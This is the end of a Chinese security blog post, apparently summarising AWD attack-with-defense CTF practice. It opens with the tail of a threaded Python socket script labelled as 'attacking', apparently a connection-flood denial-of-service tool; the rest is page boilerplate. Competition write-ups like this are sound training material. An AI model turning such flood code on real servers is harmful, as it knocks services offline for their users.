            time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">send</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">global</span> socks
    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        <span class="token keyword">for</span> s <span class="token keyword">in</span> socks<span class="token punctuation">:</span>
            <span class="token keyword">try</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"攻击中...."</span><span class="token punctuation">)</span>
            <span class="token keyword">except</span> Exception <span class="token keyword">as</span> ex<span class="token punctuation">:</span>
                socks<span class="token punctuation">.</span>remove<span class="token punctuation">(</span>s<span class="token punctuation">)</span>
                s<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
        time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">0.1</span><span class="token punctuation">)</span>

One <span class="token operator">=</span> threading<span class="token punctuation">.</span>Thread<span class="token punctuation">(</span>target<span class="token operator">=</span>connect<span class="token punctuation">,</span>args<span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
Two <span class="token operator">=</span> threading<span class="token punctuation">.</span>Thread<span class="token punctuation">(</span>target<span class="token operator">=</span>send<span class="token punctuation">,</span>args<span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
One<span class="token punctuation">.</span>start<span class="token punctuation">(</span><span class="token punctuation">)</span>
Two<span class="token punctuation">.</span>start<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://3143047748.github.io/2023/07/22/awd%E6%80%BB%E7%BB%93/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/AWD/" rel="tag">AWD</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2023/07/22/XSS%E6%80%BB%E7%BB%93/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            XSS总结
          
        </div>
      </a>
    
    
      <a href="/2023/07/22/AmateursCTF-2023wp/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">AmateursCTF 2023wp</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.staticfile.org/valine/1.4.16/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "5s6sYhVyYIhL1fb7zrErH8BX-gzGzoHsz",
    app_key: "829xTABHQSNKYRHRILDlEluh",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "给我的文章加点评论吧~",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2022-2023
        <i class="ri-heart-fill heart_icon"></i> n0rt6
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
        <li>
          <a href="https://beian.miit.gov.cn/" target="_black" rel="nofollow">豫ICP备88888888</a>
        </li>
        
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.png" alt="n0rt6&#39;s blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">Index</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">Archives</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">Categories</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">Tags</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">Friends</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">About Me</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->
 
<script src="/js/dz.js"></script>
 
<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    <div id="music">
    
    
    
    <iframe frameborder="no" border="1" marginwidth="0" marginheight="0" width="200" height="52"
        src="//music.163.com/outchain/player?type=2&id=22707008&auto=0&height=32"></iframe>
</div>

<style>
    #music {
        position: fixed;
        right: 15px;
        bottom: 0;
        z-index: 998;
    }
</style>
    
    

  </div>
</body>

</html>